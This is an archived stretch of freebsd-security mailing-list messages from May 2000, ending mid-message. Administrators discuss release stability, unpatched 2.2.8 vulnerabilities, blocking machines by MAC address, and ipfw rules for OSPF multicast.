(envelope-from nbm@sunesi.net) Received: from nbm by ns1.sunesi.net with local (Exim 3.03 #1) id 12tqSH-000AUp-00; Mon, 22 May 2000 13:33:05 +0200 Date: Mon, 22 May 2000 13:33:05 +0200 From: Neil Blakey-Milner To: Chris Johnson Cc: User Datagram Protocol , freebsd-security@freebsd.org Subject: Re: pid file for named Message-ID: <20000522133305.A40314@mithrandr.moria.org> References: <20000516131606.C16398@naiad.eclipse.net.uk> <20000516132531.M2139@closed-networks.com> <20000521222124.A55554@palomine.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: <20000521222124.A55554@palomine.net>; from cjohnson@palomine.net on Sun, May 21, 2000 at 10:21:24PM -0400 Organization: Sunesi Clinical Systems X-Operating-System: FreeBSD 3.3-RELEASE i386 X-URL: http://rucus.ru.ac.za/~nbm/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun 2000-05-21 (22:21), Chris Johnson wrote: > That hasn't been my experience, and I'm running djb's (that's Daniel J. > Bernstein, if anyone's wondering) dnscache/tinydns everywhere. If you have > performance problems, try posting a message to dns@list.cr.yp.to and see if > anyone has anything to offer. > > I've been BIND-free since dnscache's first alpha release, and I haven't had a > single problem. > > http://cr.yp.to/dnscache.html, for anyone who's interested. Have you tried the port? I haven't been able to find anyone else to test it properly. I'd appreciate some feedback. Neil (who is unfortunately maintainer for most of the djb ports) -- Neil Blakey-Milner Sunesi Clinical Systems nbm@mithrandr.moria.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 22 9:53:21 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id E39DF37BADF for ; Mon, 22 May 2000 09:53:16 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id KAA11035; Mon, 22 May 2000 10:52:56 -0600 (MDT) Message-Id: <4.3.1.2.20000522103818.04569960@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.1 Date: Mon, 22 May 2000 10:52:51 -0600 To: Matthew Dillon , Doug Barton From: Brett Glass Subject: Re: The procfs Hole in 2.2.8-STABLE? Cc: Warner Losh , cjclark@home.com, freebsd-security@FreeBSD.ORG In-Reply-To: <200005220657.XAA56693@apollo.backplane.com> References: <20000521140847.G96573@cc942873-a.ewndsr1.nj.home.com> <4.3.1.2.20000521225733.048a0c40@localhost> <3928D2D5.DCA07289@gorean.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 12:57 AM 5/22/2000, Matthew Dillon wrote: > I think 3.4 was our 'golden release' for the 3.x series. I've seen some really important fixes (not enhancements, but fixes) added after 3.4-RELEASE. Enough that I'd want to see a 3.5. > 3.5 is only > going to have small cleanups, sort of like 2.2.8 had only small cleanups > over 2.2.7. People have been MFCing bugs fixes reasonably well, but > that's as far as it's going to go. Many of the new features in 4.x > would simply be too difficult to backport into 3.x, and a lot of the > really new stuff is being built on the older new stuff in 4.0-release. > There is no chance of any of that being backported. I understand that the backporting will be limited to important features. > My personal opinion is that the 4.0 release *already* exceeded 3.4 in > regards to stability, and 4.x in general is far, far superior in > virtually all regards. SMP, VM, NFS (my babies) are direct examples. I hope you don't think that I'm putting down your work in these areas; I'm not. In fact, from what I've seen, I think it is quite good. It's simply a matter of policy. We never use a .0 version of ANYTHING, from ANYONE, in a production environment. That's true whether it's FreeBSD or (shudder) Microsoft. We've noted that FreeBSD releases usually become as stable as the last release on the previous branch at about the .2 release. But not always. There were problems in 3.2 that caused us to delay full deployment until 3.3. I might add that we do put later releases on workstations -- just not on key servers. > 4.0 is the first release where you can actually *TRUST* all the memory > manipulation and mapping syscalls (madvise, msync, mmap) to work > properly! That's good. There's been some VM strangeness in earlier versions that has hopefully been removed now. > I expect 4.1 will be the banner distribution for us if 4.0 hasn't > already stolen the thunder! 3.5 will be an afterthought at best. It will be nice if a .1 release is truly that stable! However, I think you'll agree that it would be the first time that this was so. So, we will wait and see.... We can probably make that judgment about 6 weeks after 4.1 comes out. There really is a great benefit in running software that's a bit behind the curve but whose quirks are known. The DoJ is demanding that Microsoft allow customers and OEMs to buy earlier versions of Windows rather than being forced to accept a new version.... The reason is that this is what many of them not only want but need. Forcing an upgrade is ungood. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 22 10:39: 1 2000 Delivered-To: freebsd-security@freebsd.org Received: from arf.bussert.COM (arf.bussert.com [209.183.67.130]) by hub.freebsd.org (Postfix) with ESMTP id B175D37B5AC for ; Mon, 22 May 2000 10:38:57 -0700 (PDT) (envelope-from matheny@bussert.com) Received: from localhost (matheny@localhost) by arf.bussert.COM (8.9.3/8.9.3) with ESMTP id NAA08480 for ; Mon, 22 May 2000 13:08:30 -0500 (EST) (envelope-from matheny@bussert.com) Date: Mon, 22 May 2000 13:08:30 -0500 (EST) From: Blake Matheny To: freebsd-security@freebsd.org Subject: Firewall Rules Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Is there a way to deny by mac address rather than ip address? I need to deny a group of computers (with static ip's) access to the internet, but if someone changes their ip (with DHCP) it doesn't do any good. These are windows boxes with a freebsd firewall, no policies on the computers and if possible I would like to implement this only on the firewall level. Anyone got any advice? Thanks. -Blake Blake Matheny Bussert Consulting Network Engineer (765)423-2100 matheny@bussert.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 22 11: 2:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [216.240.41.2]) by hub.freebsd.org (Postfix) with ESMTP id 6BAB537BE1C for ; Mon, 22 May 2000 11:02:36 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id LAA61355; Mon, 22 May 2000 11:02:28 -0700 (PDT) (envelope-from dillon) Date: Mon, 22 May 2000 11:02:28 -0700 (PDT) From: Matthew Dillon Message-Id: <200005221802.LAA61355@apollo.backplane.com> To: Blake Matheny Cc: freebsd-security@FreeBSD.ORG Subject: Re: Firewall Rules References: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :Is there a way to deny by mac address rather than ip address? I need to :deny a group of computers (with static ip's) access to the internet, but :if someone changes their ip (with DHCP) it doesn't do any good. These are :windows boxes with a freebsd firewall, no policies on the computers and if :possible I would like to implement this only on the firewall level. Anyone :got any advice? Thanks. :-Blake : :Blake Matheny :Bussert Consulting :Network Engineer :(765)423-2100 :matheny@bussert.com You can set dhcp up to assign a specific IP address for a specific MAC address, would that be good enough or are you worried about the windows users screwing around with their network config? -Matt Matthew Dillon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 22 11: 3: 2 2000 Delivered-To: freebsd-security@freebsd.org Received: from cc942873-a.ewndsr1.nj.home.com (cc942873-a.ewndsr1.nj.home.com [24.2.89.207]) by hub.freebsd.org (Postfix) with ESMTP id 6193C37BE96 for ; Mon, 22 May 2000 11:02:55 -0700 (PDT) (envelope-from cjc@cc942873-a.ewndsr1.nj.home.com) Received: (from cjc@localhost) by cc942873-a.ewndsr1.nj.home.com (8.9.3/8.9.3) id OAA35921; Mon, 22 May 2000 14:02:32 -0400 (EDT) (envelope-from cjc) Date: Mon, 22 May 2000 14:02:32 -0400 From: "Crist J. Clark" To: Warner Losh Cc: freebsd-security@FreeBSD.ORG Subject: Re: The procfs Hole in 2.2.8-STABLE? Message-ID: <20000522140231.A35505@cc942873-a.ewndsr1.nj.home.com> Reply-To: cjclark@home.com References: <20000521140847.G96573@cc942873-a.ewndsr1.nj.home.com> <200005220437.WAA92094@harmony.village.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <200005220437.WAA92094@harmony.village.org>; from imp@village.org on Sun, May 21, 2000 at 10:37:11PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, May 21, 2000 at 10:37:11PM -0600, Warner Losh wrote: > In message <20000521140847.G96573@cc942873-a.ewndsr1.nj.home.com> "Crist J. Clark" writes: > : Am I to take it that 2.2.8-STABLE would be vulnerable? The following > > Yes. There are many vulnerabilities that were fixed in 3.x that > haven't been back ported to 2.x. Most of the security advisories since things stopped being back-ported to 2.2.8 have been for ports. If I have the port, I remake a fixed version, use an alternative, or live without. As for things in the base system, the make vulnerability (FreeBSD-SA-00:01) doesn't really scare me on a mailserver. That seems to be the only base system one of any concequence in the advisories that has come up since they stopped getting back-ported to 2.2.8. Should I be concerned about these "many vulnerabilities?" Where are they documented? -- Crist J. Clark cjclark@home.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 22 11: 6:23 2000 Delivered-To: freebsd-security@freebsd.org Received: from toaster.sun4c.net (toaster.sun4c.net [63.193.27.6]) by hub.freebsd.org (Postfix) with ESMTP id 2031F37BBC9 for ; Mon, 22 May 2000 11:06:17 -0700 (PDT) (envelope-from andre@toaster.sun4c.net) Received: (from andre@localhost) by toaster.sun4c.net (8.9.3+openldap/8.9.3) id LAA05887; Mon, 22 May 2000 11:08:14 -0700 (PDT) Date: Mon, 22 May 2000 11:08:14 -0700 From: Andre Gironda To: Blake Matheny Cc: freebsd-security@freebsd.org Subject: Re: Firewall Rules Message-ID: <20000522110814.A5867@toaster.sun4c.net> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95i In-Reply-To: ; from Blake Matheny on Mon, May 22, 2000 at 01:08:30PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Blake, If possible, you should try to segment off those users, because I don't think there is a way with IPF or IPFW (or any firewall that I can think of) to block MAC addresses specifically. There is the VLAN management policy server from Cisco systems that is available on their Catalyst series switches. The idea behind it is that you can put specific MAC addresses into particular VLANs. I would not trust it so well, but if you want further information look up VMPS. Also, from LISA '99 there was a paper on doing MAC authentication but it was with locked-down ports (but I assume this does not limit DHCP depending on what you are doing): Dealing with Public Ethernet Jacks - Switches, Gateways, and Authentication http://www.ualberta.ca/~beck/authgw.html There are actually a lot of ways to do this depending on what your network looks like and what your requirements are. dre On Mon, May 22, 2000 at 01:08:30PM -0500, Blake Matheny wrote: > Is there a way to deny by mac address rather than ip address? I need to > deny a group of computers (with static ip's) access to the internet, but > if someone changes their ip (with DHCP) it doesn't do any good. These are > windows boxes with a freebsd firewall, no policies on the computers and if > possible I would like to implement this only on the firewall level. Anyone > got any advice? Thanks. > -Blake > > Blake Matheny > Bussert Consulting > Network Engineer > (765)423-2100 > matheny@bussert.com > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- This program has been brought to you by the language C and the number F. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 22 11:11:19 2000 Delivered-To: freebsd-security@freebsd.org Received: from arf.bussert.COM (arf.bussert.com [209.183.67.130]) by hub.freebsd.org (Postfix) with ESMTP id C6A7737BC6B for ; Mon, 22 May 2000 11:11:12 -0700 (PDT) (envelope-from matheny@bussert.com) Received: from localhost (matheny@localhost) by arf.bussert.COM (8.9.3/8.9.3) with ESMTP id NAA08655; Mon, 22 May 2000 13:40:32 -0500 (EST) (envelope-from matheny@bussert.com) Date: Mon, 22 May 2000 13:40:32 -0500 (EST) From: Blake Matheny To: Matthew Dillon Cc: freebsd-security@FreeBSD.ORG Subject: Re: Firewall Rules In-Reply-To: <200005221802.LAA61355@apollo.backplane.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Yeah, I'm worried that some windows users (that can read) :) might try to change the network settings, etc. Blake Matheny Bussert Consulting Network Engineer (765)423-2100 matheny@bussert.com On Mon, 22 May 2000, Matthew Dillon wrote: > :Is there a way to deny by mac address rather than ip address? I need to > :deny a group of computers (with static ip's) access to the internet, but > :if someone changes their ip (with DHCP) it doesn't do any good. These are > :windows boxes with a freebsd firewall, no policies on the computers and if > :possible I would like to implement this only on the firewall level. Anyone > :got any advice? Thanks. > :-Blake > : > :Blake Matheny > :Bussert Consulting > :Network Engineer > :(765)423-2100 > :matheny@bussert.com > > You can set dhcp up to assign a specific IP address for a specific > MAC address, would that be good enough or are you worried about > the windows users screwing around with their network config? > > -Matt > Matthew Dillon > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 22 11:15:23 2000 Delivered-To: freebsd-security@freebsd.org Received: from arf.bussert.COM (arf.bussert.com [209.183.67.130]) by hub.freebsd.org (Postfix) with ESMTP id 2D0AB37BC77 for ; Mon, 22 May 2000 11:15:19 -0700 (PDT) (envelope-from matheny@bussert.com) Received: from localhost (matheny@localhost) by arf.bussert.COM (8.9.3/8.9.3) with ESMTP id NAA08688; Mon, 22 May 2000 13:44:46 -0500 (EST) (envelope-from matheny@bussert.com) Date: Mon, 22 May 2000 13:44:46 -0500 (EST) From: Blake Matheny To: Andre Gironda Cc: freebsd-security@freebsd.org Subject: Re: Firewall Rules In-Reply-To: <20000522110814.A5867@toaster.sun4c.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I'm thinking of writing something that utilizes something like arpwatch to keep an eye on mac/ip address mappings. Then if a mac address changes ip it get's added to a list which is filtered by ipfw. Does anyone know of something like this or have any other suggestions? Blake Matheny Bussert Consulting Network Engineer (765)423-2100 matheny@bussert.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 22 11:17: 4 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id F37F037C12E for ; Mon, 22 May 2000 11:16:56 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id MAA07269; Mon, 22 May 2000 12:16:39 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id MAA96713; Mon, 22 May 2000 12:15:39 -0600 (MDT) Message-Id: <200005221815.MAA96713@harmony.village.org> To: cjclark@home.com Subject: Re: The procfs Hole in 2.2.8-STABLE? Cc: freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Mon, 22 May 2000 14:02:32 EDT." <20000522140231.A35505@cc942873-a.ewndsr1.nj.home.com> References: <20000522140231.A35505@cc942873-a.ewndsr1.nj.home.com> <20000521140847.G96573@cc942873-a.ewndsr1.nj.home.com> <200005220437.WAA92094@harmony.village.org> Date: Mon, 22 May 2000 12:15:39 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <20000522140231.A35505@cc942873-a.ewndsr1.nj.home.com> "Crist J. Clark" writes: : Should I be concerned about these "many vulnerabilities?" Where are : they documented? We stopped committing to make backports to 2.x when FreeBSD 3.2 was released, or about this time last year. Anything that happened after that may or may not hav emade it back to 2.2.8. Also, some of them weren't noteworthy at the time, so no advisory was issued (I had the advisory setting too high). Some exploits have surfaced against old versions of FreeBSD. There's no central collection of these documented anywhere. I wish I had a better answer for you than this. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 22 12:52:28 2000 Delivered-To: freebsd-security@freebsd.org Received: from ms.securenet.net (ms.securenet.net [205.236.147.20]) by hub.freebsd.org (Postfix) with ESMTP id D3E1D37BBC7 for ; Mon, 22 May 2000 12:52:24 -0700 (PDT) (envelope-from vandj@securenet.net) Received: from notepad.securenet.net ([216.113.17.3]) by ms.securenet.net (8.10.1/8.10.1) with ESMTP id e4MJqKq95045 for ; Mon, 22 May 2000 15:52:20 -0400 (EDT) Message-Id: <4.3.1.2.20000522154805.00bb55a0@pop.securenet.net> X-Sender: vandj@pop.securenet.net X-Mailer: QUALCOMM Windows Eudora Version 4.3.1 Date: Mon, 22 May 2000 15:50:30 -0400 To: freebsd-security@FreeBSD.ORG From: "Jean M. Vandette" Subject: IPFW and OSPF Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Greetings all, I was wondering if anyone could tell me what rule to put into the rc.firewall so ospf multicast updates will pass to the local servers. I've tried a few things without much success any help would be appreciated. Thanks in advance for any assistance. Jean M. Vandette To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 22 14:19:18 2000 Delivered-To: freebsd-security@freebsd.org Received: from clavin.efn.org (clavin.efn.org [206.163.176.10]) by hub.freebsd.org (Postfix) with ESMTP id 8EC4B37BB8B for ; Mon, 22 May 2000 14:19:16 -0700 (PDT) (envelope-from bdeless@efn.org) Received: from garcia.efn.org (bdeless@garcia.efn.org [206.163.176.5]) by clavin.efn.org (8.10.1/8.10.1) with ESMTP id e4MLIux25116 for ; Mon, 22 May 2000 14:19:01 -0700 (PDT) Received: from localhost (bdeless@localhost) by garcia.efn.org (8.10.1/8.10.1) with ESMTP id e4MLIfh00141 for ; Mon, 22 May 2000 14:18:55 -0700 (PDT) X-Authentication-Warning: garcia.efn.org: bdeless owned process doing -bs Date: Mon, 22 May 2000 14:18:38 -0700 (PDT) From: BD To: freebsd-security@freebsd.org Subject: Web Server and Xwindows Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I currently run a web site on a 4.0 box using the current version of Apache. I must confess a desire to install X(w/KDE) now. This box is in the DMZ, has PHP3 and MySQL. Sendmail is also handled here. Stateful packet filtering only allows 80,443,25,110-all with wrappers. Is X still the security risk I've always been taught? Any thoughts or advice is appreciated. Many Thanks, Robert To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 22 14:45:43 2000 Delivered-To: freebsd-security@freebsd.org Received: from spike.brainlink.com (spike.brainlink.com [206.127.59.100]) by hub.freebsd.org (Postfix) with ESMTP id 4FB1637B5AE for ; Mon, 22 May 2000 14:45:32 -0700 (PDT) (envelope-from spork@spike.brainlink.com) Received: (from spork@localhost) by spike.brainlink.com (8.9.3/8.9.3) id RAA03230; Mon, 22 May 2000 17:44:01 -0400 (EDT) (envelope-from spork) Date: Mon, 22 May 2000 17:44:00 -0400 From: Spike Gronim To: Blake Matheny Cc: freebsd-security@freebsd.org Subject: Re: Firewall Rules Message-ID: <20000522174400.A3178@spike.brainlink.com> Reply-To: gronimw@stuy.edu References: <20000522110814.A5867@toaster.sun4c.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: ; from matheny@bussert.com on Mon, May 22, 2000 at 01:44:46PM -0500 X-PGP-Public-Key: http://www.gronim.com/spike/pubkey.asc X-PGP-fingerprint: 05 92 88 05 3C DB F2 40 AB 1D AE 2A F0 E5 FA A5 X-Geek-Code: http://www.gronim.com/spike/geekcode Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, May 22, 2000 at 01:44:46PM -0500, Blake Matheny wrote: > I'm thinking of writing something that utilizes something like arpwatch to > keep an eye on mac/ip address mappings. Then if a mac address changes ip > it get's added to a list which is filtered by ipfw. Does anyone know of > something like this or have any other suggestions? One problem I see with that is that I could maliciously change my IP to that of another machine and get it blocked from the net. > > Blake Matheny > Bussert Consulting > Network Engineer > (765)423-2100 > matheny@bussert.com > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- --Spike Gronim gronimw@stuy.edu "Oh yes? An obscene triangle which, has more courage than the word." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 22 15:55:45 2000 Delivered-To: freebsd-security@freebsd.org Received: from sneety.insync.net (sneety.insync.net [209.113.65.5]) by hub.freebsd.org (Postfix) with ESMTP id C61A237B63A for ; Mon, 22 May 2000 15:55:39 -0700 (PDT) (envelope-from dgailey@insync.net) Received: from hexidec (hstn-pri1-a44.txucom.net [209.34.59.44]) by sneety.insync.net (8.9.3/8.9.3) with SMTP id RAA21394; Mon, 22 May 2000 17:55:17 -0500 (CDT) Message-ID: <004001bfc441$2e135340$d72210d1@insync.net> From: "Dan Gailey" To: , "Jean M. Vandette" References: <4.3.1.2.20000522154805.00bb55a0@pop.securenet.net> Subject: Re: IPFW and OSPF Date: Mon, 22 May 2000 17:57:53 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2314.1300 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org try reading the RFC's? -sincerely, dan. ----- Original Message ----- From: Jean M. Vandette To: Sent: Monday, May 22, 2000 2:50 PM Subject: IPFW and OSPF > Greetings all, > > I was wondering if anyone could tell me what rule to put into > the rc.firewall so ospf multicast updates will pass to the local > servers. I've tried a few things without much success any help > would be appreciated. > > Thanks in advance for any assistance. > > Jean M. Vandette > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 22 16: 6:53 2000 Delivered-To: freebsd-security@freebsd.org Received: from toaster.sun4c.net (toaster.sun4c.net [63.193.27.6]) by hub.freebsd.org (Postfix) with ESMTP id 6AB6637B7A9 for ; Mon, 22 May 2000 16:06:50 -0700 (PDT) (envelope-from andre@toaster.sun4c.net) Received: (from andre@localhost) by toaster.sun4c.net (8.9.3+openldap/8.9.3) id QAA06151; Mon, 22 May 2000 16:09:07 -0700 (PDT) Date: Mon, 22 May 2000 16:09:06 -0700 From: Andre Gironda To: "Jean M. Vandette" Cc: freebsd-security@FreeBSD.ORG Subject: Re: IPFW and OSPF Message-ID: <20000522160906.B5867@toaster.sun4c.net> References: <4.3.1.2.20000522154805.00bb55a0@pop.securenet.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95i In-Reply-To: <4.3.1.2.20000522154805.00bb55a0@pop.securenet.net>; from Jean M. Vandette on Mon, May 22, 2000 at 03:50:30PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Uh... I think you might be able to do this with IPFW. I haven't done it myself. According to /etc/protocols, OSPF is IP proto type 89. so like "ipfw add allow 89 from to " or just "ipfw add allow ospf from any to any" :> but that's just the IGP, now you have to worry about passing LSA and Hello's... they run over Multicast (224.0.0.5 and 224.0.0.6) with TTL=1 So, you have multicast group 224.0.0.5 (all routers) and 224.0.0.6 (designated routers - DR's) that you need to allow (ipfw add allow all from 224.0.0.X to X). Make sure you use "all" or type 2 (IGMP). Realize that this will only allow multicast to the local network (which is hopefully all you need) because of the multicast ttl=1 (see ip(4) for more information). dre On Mon, May 22, 2000 at 03:50:30PM -0400, Jean M. Vandette wrote: > Greetings all, > > I was wondering if anyone could tell me what rule to put into > the rc.firewall so ospf multicast updates will pass to the local > servers. I've tried a few things without much success any help > would be appreciated. > > Thanks in advance for any assistance. > > Jean M. Vandette > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- This program has been brought to you by the language C and the number F. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 22 18:27: 2 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns1.via-net-works.net.ar (ns1.via-net-works.net.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id D2F6537B7AD for ; Mon, 22 May 2000 18:26:58 -0700 (PDT) (envelope-from fpscha@ns1.via-net-works.net.ar) Received: (from fpscha@localhost) by ns1.via-net-works.net.ar (8.9.3/8.9.3) id WAA02250; Mon, 22 May 2000 22:26:15 -0300 (GMT) From: Fernando Schapachnik Message-Id: <200005230126.WAA02250@ns1.via-net-works.net.ar> Subject: Re: The procfs Hole in 2.2.8-STABLE? In-Reply-To: <200005221815.MAA96713@harmony.village.org> from Warner Losh at "May 22, 0 12:15:39 pm" To: imp@village.org (Warner Losh) Date: Mon, 22 May 2000 22:26:15 -0300 (GMT) Cc: cjclark@home.com, freebsd-security@FreeBSD.ORG Reply-To: Fernando Schapachnik X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org En un mensaje anterior, Warner Losh escribió: > We stopped committing to make backports to 2.x when FreeBSD 3.2 was > released, or about this time last year. Anything that happened after > that may or may not hav emade it back to 2.2.8. Also, some of them > weren't noteworthy at the time, so no advisory was issued (I had the > advisory setting too high). Some exploits have surfaced against old > versions of FreeBSD. There's no central collection of these > documented anywhere. I wish I had a better answer for you than this. Any of them is a remote exploit? Have an URL? Thanks! Fernando P. Schapachnik Administración de la red VIA NET.WORKS ARGENTINA S.A. fernando@via-net-works.net.ar (54-11) 4323-3333 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 22 18:41: 6 2000 Delivered-To: freebsd-security@freebsd.org Received: from nsm.htp.org (nsm.htp.org [202.241.243.104]) by hub.freebsd.org (Postfix) with SMTP id A502337BB22 for ; Mon, 22 May 2000 18:41:00 -0700 (PDT) (envelope-from sen_ml@eccosys.com) Received: (qmail 29341 invoked from network); 23 May 2000 01:37:03 -0000 Received: from localhost (127.0.0.1) by localhost with SMTP; 23 May 2000 01:37:03 -0000 To: freebsd-security@freebsd.org Subject: Re: Firewall Rules From: sen_ml@eccosys.com In-Reply-To: <20000522110814.A5867@toaster.sun4c.net> References: <20000522110814.A5867@toaster.sun4c.net> X-Mailer: Mew version 1.94.1 on Emacs 20.6 / Mule 4.0 (HANANOEN) X-No-Archive: Yes Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-Id: <20000523104053L.1001@eccosys.com> Date: Tue, 23 May 2000 10:40:53 +0900 X-Dispatcher: imput version 20000228(IM140) Lines: 18 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org From: Andre Gironda Subject: Re: Firewall Rules Date: Mon, 22 May 2000 11:08:14 -0700 Message-ID: <20000522110814.A5867@toaster.sun4c.net> > If possible, you should try to segment off those users, because I don't > think there is a way with IPF or IPFW (or any firewall that I can think > of) to block MAC addresses specifically. a bit off-topic remark... not a bsd option, but iptables for linux has a module for filtering by mac address. if interested, have a look at the "other match extensions" section of: http://netfilter.kernelnotes.org/iptables-HOWTO-7.html back to our regularly scheduled program ;-) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 22 19:24:45 2000 Delivered-To: freebsd-security@freebsd.org Received: from cc942873-a.ewndsr1.nj.home.com (cc942873-a.ewndsr1.nj.home.com [24.2.89.207]) by hub.freebsd.org (Postfix) with ESMTP id 8E9B537B64D for ; Mon, 22 May 2000 19:24:42 -0700 (PDT) (envelope-from cjc@cc942873-a.ewndsr1.nj.home.com) Received: (from cjc@localhost) by cc942873-a.ewndsr1.nj.home.com (8.9.3/8.9.3) id WAA37181; Mon, 22 May 2000 22:23:30 -0400 (EDT) (envelope-from cjc) Date: Mon, 22 May 2000 22:23:29 -0400 From: "Crist J. Clark" To: Andre Gironda Cc: Blake Matheny , freebsd-security@FreeBSD.ORG Subject: Re: Firewall Rules Message-ID: <20000522222329.C36986@cc942873-a.ewndsr1.nj.home.com> Reply-To: cjclark@home.com References: <20000522110814.A5867@toaster.sun4c.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <20000522110814.A5867@toaster.sun4c.net>; from andre@sun4c.net on Mon, May 22, 2000 at 11:08:14AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, May 22, 2000 at 11:08:14AM -0700, Andre Gironda wrote: > > Blake, > > If possible, you should try to segment off those users, because I don't > think there is a way with IPF or IPFW (or any firewall that I can think > of) to block MAC addresses specifically. Wouldn't it be possible to essentially dev-null all but 